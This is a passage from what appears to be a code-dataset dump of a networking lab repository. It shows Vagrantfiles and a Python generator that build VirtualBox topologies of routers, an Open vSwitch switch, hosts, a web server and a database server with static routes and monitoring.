255.255.252.0 gw 172.16.4.9 dev eth2\\n\")\nf.write(\"sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.4.9 dev eth2\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Router--2 is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"router2.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n# User can select the desired menmory for the machine. we must allow them\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"switch\\\" do |switch|\\n\")\nf.write(\"switch.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"switch.vm.hostname = \\\"switch\\\"\\n\")\nf.write(\"switch.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\nf.write(\"switch.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_a\\\", auto_config: false\\n\")\nf.write(\"switch.vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_host_b\\\", auto_config: false\\n\")\nf.write(\"switch.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"OpenVSwitch Installation is started\\\"\\n\")\nf.write(\"apt-get update\\n\")\nf.write(\"apt-get install -y tcpdump\\n\")\nf.write(\"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\\n\")\nf.write(\"echo \\\"OpenVSwitch Bridge Configuration Started\\\"\\n\")\nf.write(\"sudo ovs-vsctl add-br SW1\\n\")\nf.write(\"sudo ovs-vsctl add-br HA\\n\")\nf.write(\"sudo ovs-vsctl add-br HB\\n\")\nf.write(\"sudo ovs-vsctl add-port SW1 eth1\\n\")\nf.write(\"sudo ovs-vsctl add-port HA eth2\\n\")\nf.write(\"sudo ovs-vsctl add-port HB eth3\\n\")\nf.write(\"echo \\\"Bridge configuration END\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"switch.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"OpenVSwitch Ip addressing is started\\\"\\n\")\nf.write(\"sudo ifconfig SW1 172.16.3.2/28\\n\")\nf.write(\"sudo ifconfig HA 172.16.8.10/22\\n\")\nf.write(\"sudo ifconfig HB 172.16.12.10/22\\n\")\nf.write(\"sudo ifconfig SW1 up\\n\")\nf.write(\"sudo ifconfig HA up\\n\")\nf.write(\"sudo ifconfig HB up\\n\")\nf.write(\"sudo ifconfig eth1 up\\n\")\nf.write(\"sudo ifconfig eth2 up\\n\")\nf.write(\"sudo ifconfig eth3 up\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.3.5 dev SW1\\n\")\nf.write(\"sudo route add -net 
172.16.2.0 netmask 255.255.255.0 gw 172.16.3.5 dev SW1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Switch is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"switch.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n# User can select the desired menmory for the machine. we must allow them\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\n\nf.write(\"config.vm.define \\\"host-a\\\" do |hosta|\\n\")\nf.write(\"hosta.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hosta.vm.hostname = \\\"host-a\\\"\\n\")\nf.write(\"hosta.vm.network \\\"private_network\\\", ip: \\\"172.16.8.5\\\", netmask: \\\"255.255.252.0\\\", virtualbox__intnet: \\\"broadcast_host_a\\\", auto_config: true\\n\")\nf.write(\"#hosta.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"#echo \\\"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on Host--A\\\"\\n\")\nf.write(\"#sudo apt-get update\\n\")\nf.write(\"#sudo apt-get install -y lynx\\n\")\nf.write(\"#echo \\\"Lynx-Browser is installed\\\"\\n\")\nf.write(\"#SHELL\\n\")\nf.write(\"hosta.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started for Host--A\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.8.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.8.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.8.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.8.10 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--A is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hosta.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-b\\\" do |hostb|\\n\")\nf.write(\"hostb.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hostb.vm.hostname = \\\"host-b\\\"\\n\")\nf.write(\"hostb.vm.network \\\"private_network\\\", ip: \\\"172.16.12.5\\\", netmask: \\\"255.255.252.0\\\", virtualbox__intnet: \\\"broadcast_host_b\\\", auto_config: true\\n\")\nf.write(\"#hostb.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"#echo \\\"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on Host-B\\\"\\n\")\nf.write(\"#sudo apt-get update\\n\")\nf.write(\"#sudo apt-get install -y lynx\\n\")\nf.write(\"#echo \\\"Lynx-Browser is installed\\\"\\n\")\nf.write(\"#SHELL\\n\")\nf.write(\"hostb.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started for Host--B\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.12.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.12.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.12.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.12.10 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--B is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostb.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 
1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"config.vm.define \\\"host-c\\\" do |hostc|\\n\")\nf.write(\"hostc.vm.box = \\\"bento/ubuntu-16.04\\\"\\n\")\nf.write(\"hostc.vm.hostname = \\\"host-c\\\"\\n\")\nf.write(\"hostc.vm.network \\\"private_network\\\", ip: \\\"172.16.2.5\\\", netmask: \\\"255.255.255.0\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\")\nf.write(\"hostc.vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\nf.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\nf.write(\"sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.2.10 dev eth1\\n\")\nf.write(\"echo \\\"Configuration END\\\"\\n\")\nf.write(\"echo \\\"Host--C is ready to Use\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostc.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\nf.write(\"echo \\\"Installation of Web-Server\\\"\\n\")\nf.write(\"sudo apt-get update\\n\")\nf.write(\"sudo apt-get install -y apache2\\n\")\nf.write(\"echo \\\"Web-ServerServer is installed and Runing\\\"\\n\")\nf.write(\"SHELL\\n\")\nf.write(\"hostc.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\nf.write(\"vb.memory = 1024\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.write(\"end\\n\")\nf.close()\n#open and read the file after the appending:\nf = open(\"vagrant.txt\", \"r\")\nprint(f.read())\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n"
},
{
"alpha_fraction": 0.5957529544830322,
"alphanum_fraction": 0.7023177742958069,
"avg_line_length": 44.69822311401367,
"blob_id": "d6adf344fb50b3c086b09eb979153e733b51c0c8",
"content_id": "e7f78e83f8732d5d53c4f24663136630d798f0cf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 7723,
"license_type": "permissive",
"max_line_length": 153,
"num_lines": 169,
"path": "/AllVagrantFiles/Routing_and_Switching/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# configures the configuration version (we support older styles for\n# backwards compatibility). Please don't change it unless you know what\n# you're doing.\nVagrant.configure(\"2\") do |config|\n config.vm.box_check_update = true\n config.vm.provider \"virtualbox\" do |vb|\n vb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\n vb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\n vb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\n vb.cpus = 1\n end\n config.vm.define \"router-1\" do |router1|\n router1.vm.box = \"bento/ubuntu-16.04\"\n router1.vm.hostname = \"router-1\"\n router1.vm.network \"private_network\", ip: \"172.16.3.5\", netmask: \"255.255.255.240\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\n router1.vm.network \"private_network\", ip: \"172.16.4.9\",netmask: \"255.255.255.252\", virtualbox__intnet: \"broadcast_router-inter\", auto_config: true\n router1.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.4.10 dev eth2\n\tsudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.3.2 dev eth1\n\tsudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.3.2 dev eth1\n\techo \"Configuration END\"\n\techo \"Router--1 is ready to Use\"\t\n\tSHELL\n router1.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"router-2\" do |router2|\n router2.vm.box = \"bento/ubuntu-16.04\"\n router2.vm.hostname = \"router-2\"\n router2.vm.network \"private_network\", ip: \"172.16.2.10\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n router2.vm.network \"private_network\", ip: \"172.16.4.10\", netmask: \"255.255.255.252\", virtualbox__intnet: \"broadcast_router-inter\", auto_config: true\n router2.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.4.9 dev eth2\n sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.4.9 dev eth2\n sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.4.9 dev eth2\n\techo \"Configuration END\"\n\techo \"Router--2 is ready to Use\"\t\n\tSHELL\n\trouter2.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"switch\" do |switch|\n switch.vm.box = \"bento/ubuntu-16.04\"\n switch.vm.hostname = \"switch\"\n switch.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: false\n switch.vm.network \"private_network\", virtualbox__intnet: \"broadcast_host_a\", auto_config: false\n switch.vm.network \"private_network\", virtualbox__intnet: \"broadcast_host_b\", auto_config: false\n switch.vm.provision \"shell\", inline: <<-SHELL\n\techo \"OpenVSwitch Installation is started\"\n\tapt-get update\n\tapt-get install -y tcpdump\n\tapt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\n\techo \"OpenVSwitch Bridge Configuration 
Started\"\n\tsudo ovs-vsctl add-br SW1\n\tsudo ovs-vsctl add-br HA\n\tsudo ovs-vsctl add-br HB\n\tsudo ovs-vsctl add-port SW1 eth1\n\tsudo ovs-vsctl add-port HA eth2\n\tsudo ovs-vsctl add-port HB eth3\n\techo \"Bridge configuration END\"\n\tSHELL\n\tswitch.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"OpenVSwitch Ip addressing is started\"\n\tsudo ifconfig SW1 172.16.3.2/28\n\tsudo ifconfig HA 172.16.8.10/22\n\tsudo ifconfig HB 172.16.12.10/22\n\tsudo ifconfig SW1 up\n\tsudo ifconfig HA up\n\tsudo ifconfig HB up\n\tsudo ifconfig eth1 up\n\tsudo ifconfig eth2 up\n\tsudo ifconfig eth3 up\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.3.5 dev SW1\n\tsudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.3.5 dev SW1\n\techo \"Configuration END\"\n\techo \"Switch is ready to Use\"\t\n\tSHELL\n\t switch.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"host-a\" do |hosta|\n hosta.vm.box = \"bento/ubuntu-16.04\"\n hosta.vm.hostname = \"host-a\"\n hosta.vm.network \"private_network\", ip: \"172.16.8.5\", netmask: \"255.255.252.0\", virtualbox__intnet: \"broadcast_host_a\", auto_config: true\n #hosta.vm.provision \"shell\", inline: <<-SHELL\n\t#echo \"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on Host--A\"\n\t#sudo apt-get update\n\t#sudo apt-get install -y lynx\n\t#echo \"Lynx-Browser is installed\"\n\t#SHELL\t\t\n\thosta.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started for Host--A\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.8.10 dev eth1\n sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.8.10 dev eth1\n sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.8.10 dev eth1\n sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.8.10 dev eth1\n\techo \"Configuration END\"\n\techo \"Host--A is ready to Use\"\t\n\tSHELL\n\thosta.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"host-b\" do |hostb|\n hostb.vm.box = \"bento/ubuntu-16.04\"\n hostb.vm.hostname = \"host-b\"\n hostb.vm.network \"private_network\", ip: \"172.16.12.5\", netmask: \"255.255.252.0\", virtualbox__intnet: \"broadcast_host_b\", auto_config: true\n #hostb.vm.provision \"shell\", inline: <<-SHELL\n\t#echo \"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on Host-B\"\n\t#sudo apt-get update\n\t#sudo apt-get install -y lynx\n\t#echo \"Lynx-Browser is installed\"\n\t#SHELL\t\n\thostb.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routig configuration Started for Host--B\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.12.10 dev eth1\n sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.12.10 dev eth1\n sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.12.10 dev eth1\n sudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.12.10 dev eth1\n\techo \"Configuration END\"\n\techo \"Host--B is ready to Use\"\t\n\tSHELL\n\thostb.vm.provider \"virtualbox\" do |vb|\n vb.memory = 1024\n end\n end\n config.vm.define \"host-c\" do |hostc|\n hostc.vm.box = \"bento/ubuntu-16.04\"\n hostc.vm.hostname = \"host-c\"\n hostc.vm.network \"private_network\", ip: \"172.16.2.5\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", 
auto_config: true\n    hostc.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n\techo \"Static Routing configuration Started\"\n\tsudo sysctl -w net.ipv4.ip_forward=1\n\tsudo route add -net 172.16.2.0 netmask 255.255.255.0 gw 172.16.2.10 dev eth1\n\tsudo route add -net 172.16.3.0 netmask 255.255.255.240 gw 172.16.2.10 dev eth1\n    sudo route add -net 172.16.4.8 netmask 255.255.255.252 gw 172.16.2.10 dev eth1\n    sudo route add -net 172.16.8.0 netmask 255.255.252.0 gw 172.16.2.10 dev eth1\n    sudo route add -net 172.16.12.0 netmask 255.255.252.0 gw 172.16.2.10 dev eth1\n\techo \"Configuration END\"\n\techo \"Host--C is ready to Use\"\t\n\tSHELL\n\thostc.vm.provision \"shell\", inline: <<-SHELL\n\techo \"Installation of Web-Server\"\n\tsudo apt-get update\n\tsudo apt-get install -y apache2\n\techo \"Web-Server is installed and Running\"\n\tSHELL\n\t hostc.vm.provider \"virtualbox\" do |vb|\n      vb.memory = 1024\n    end\n  end\nend\n"
},
{
"alpha_fraction": 0.5716111063957214,
"alphanum_fraction": 0.5875838398933411,
"avg_line_length": 38.28870391845703,
"blob_id": "66eb389e3a0345608e108fe7674e280c0fa57c8d",
"content_id": "dd3389775842240c3ba1f647795791b33e1104f1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9393,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 239,
"path": "/fromHTMLtoVagrant/VagrantTopologyWebServer.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n f.write('# webserver and a host you can access the webserver from your browser with ip address 10.0.0.50 or from the host \\n')\n f.write('# -*- mode: ruby -*-\\n')\n f.write('# vi: set ft=ruby :\\n')\n\n f.write('Vagrant.configure(\"2\") do |config|\\n')\n f.write('# Configure web server machine\\n')\n\n\ndef writeWebServer(f, Web, edges):\n\n Id = Web[\"id\"]\n Name = Web[\"label\"]\n Os = Web[\"vm_image\"]\n Ip = Web[\"network_interfaces\"][0][\"ip_address\"]\n Ram = Web[\"ram\"]\n N_Cpus = Web[\"n_cpus\"]\n InterfaceName = Web[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Web[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n CustumScript = Web[\"custom_script\"]\n \n\n f.write('config.vm.define \\\"' + Name + '\\\" do |' + Name + '|\\n')\n f.write(Name + '.vm.box = \\\"' + Os + '\\\"\\n')\n f.write(Name + '.vm.hostname = \\\"' + Name + '\\\"\\n')\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + Ip + '\\\" \\n')\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + '.vm.provision \"shell\", inline: <<-SHELL \\n') \n f.write('echo \"Starting Provision: web server\"\\n')\n f.write('sudo apt-get update\\n')\n f.write('sudo apt-get install -y nginx\\n')\n f.write('touch /var/www/html/index.php\\n')\n f.write('sudo apt-get install -y php-fpm php-mysql\\n')\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('cd wondershaper\\n')\n f.write('sudo ./wondershaper -a ' + InterfaceName)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write('echo \"Provision web server complete\"\\n')\n f.write('SHELL\\n')\n f.write(Name + '.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.memory = ' + str(Ram) + '\\n')\n f.write('vb.cpus = ' + str(N_Cpus) + '\\n')\n f.write('end\\n')\n f.write('end\\n')\n\n\ndef writeDatabase(f, Db, edges):\n\n Id = Db[\"id\"]\n Name = Db[\"label\"]\n Os = Db[\"vm_image\"]\n Ip = Db[\"network_interfaces\"][0][\"ip_address\"]\n Ram = Db[\"ram\"]\n N_Cpus = Db[\"n_cpus\"]\n InterfaceName = Db[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Db[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n CustumScript = Db[\"custom_script\"]\n\n f.write('# Configure database server machine\\n')\n f.write('config.vm.define \\\"' + Name + '\\\" do |' + Name + '|\\n')\n f.write(Name 
+ '.vm.box = \\\"' + Os + '\\\"\\n')\n f.write(Name + '.vm.hostname = \\\"' + Name + '\\\"\\n')\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + Ip + '\\\" \\n')\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + '.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\\n')\n f.write('sudo apt update\\n')\n f.write('sudo DEBIAN_FRONTEND=noninteractive apt-get -q -y install mysql-server\\n')\n f.write('echo \\\"WARNING: It is necessary to set the root password of mysql-server before using it!!!\\\"\\n')\n f.write('echo \\\"Example password configuration: mysqladmin -u root password mysecretpasswordgoeshere\\\"\\n')\n f.write('sleep 10\\n')\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('cd wondershaper\\n')\n f.write('sudo ./wondershaper -a ' + InterfaceName)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n f.write('echo \"Provision database server complete\"\\n')\n f.write('SHELL\\n')\n f.write(Name + '.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.memory = ' + str(Ram) + '\\n')\n f.write('vb.cpus = ' + str(N_Cpus) + '\\n')\n f.write('end\\n')\n f.write('end\\n')\n \n\"\"\"\nweb1 = (1,{\n \"Id\" : 1,\n \"Name\":\"web1\",\n \"Os\": \"ubuntu/xenial64\",\n \"Ip\": \"10.0.0.50\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\"\n})\n\ndb1 = (2,{\n \"Id\" : 2,\n \"Name\":\"db1\",\n \"Os\": \"ubuntu/xenial64\",\n \"Ip\": \"10.0.0.51\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\"\n})\n\n\nMyNet = [web1,db1]\n\n\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef remap(newList):\n print(\"-------------------\")\n\n for item in newList:\n print(\"Looking at device \" + str(item))\n print(\"the TYPE is \" + item[\"type\"])\n\n print(\"remap of device \" + str(device[1][\"Id\"] + \" to device \" + str(item[\"id\"])))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n device[1][\"N_Cpus\"] = item[\"n_cpus\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n #device[1][\"Network\"][0][\"Uplink_bandwidth\"] = \n\n\n if item[\"type\"] == \"web\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = 
item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n device[1][\"Network\"][1][\"Ip\"] = item[\"network_interfaces\"][1][\"ip_address\"]\n device[1][\"Network\"][1][\"Netmask\"] = item[\"network_interfaces\"][1][\"netmask\"]\n device[1][\"Network\"][1][\"Interface\"] = item[\"network_interfaces\"][1][\"name_interface\"]\n\n device[1][\"Network\"][2][\"Ip\"] = item[\"network_interfaces\"][2][\"ip_address\"]\n device[1][\"Network\"][2][\"Netmask\"] = item[\"network_interfaces\"][2][\"netmask\"]\n device[1][\"Network\"][2][\"Interface\"] = item[\"network_interfaces\"][2][\"name_interface\"] \n\n for item in newList:\n if item[\"type\"] == \"db\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n return MyNet\n\"\"\"\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n #read the data structure from input\n #Network = G.nodes.data():\n #file = codecs.open(\"NetworkGraphs/Template/OSPF_Routing_Template.html\", \"r\", \"utf-8\")\n #html = file.read()\n\n #if \"nodes = new vis.DataSet(\" in html:\n # listOfDevice = find_between(html, \"nodes = new vis.DataSet(\" , \")\")\n # print(listOfDevice)\n # listOfDevice = yaml.load(listOfDevice) \n\n #newNet = remap(listOfDevice)\n\n #Network = MyNet #RICAMBIALA CON NEWNET\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n\n BeginVagrantFile(VagrantFile)\n for node in nodes:\n if node[\"type\"] == \"web\":\n writeWebServer(VagrantFile, node, edges)\n if node[\"type\"] == \"db\":\n writeDatabase(VagrantFile, node, edges)\n VagrantFile.write('end\\n')\n VagrantFile.close()\n\n"
},
{
"alpha_fraction": 0.6040105223655701,
"alphanum_fraction": 0.6730808019638062,
"avg_line_length": 39.105690002441406,
"blob_id": "12581a8537e24d8e8115dd6260da14e54e8dd776",
"content_id": "2561794048ce45a01f55c579b11a46f27b8c40d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 4937,
"license_type": "permissive",
"max_line_length": 156,
"num_lines": 123,
"path": "/AllVagrantFiles/Host_and_mysql_server_with_docker/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
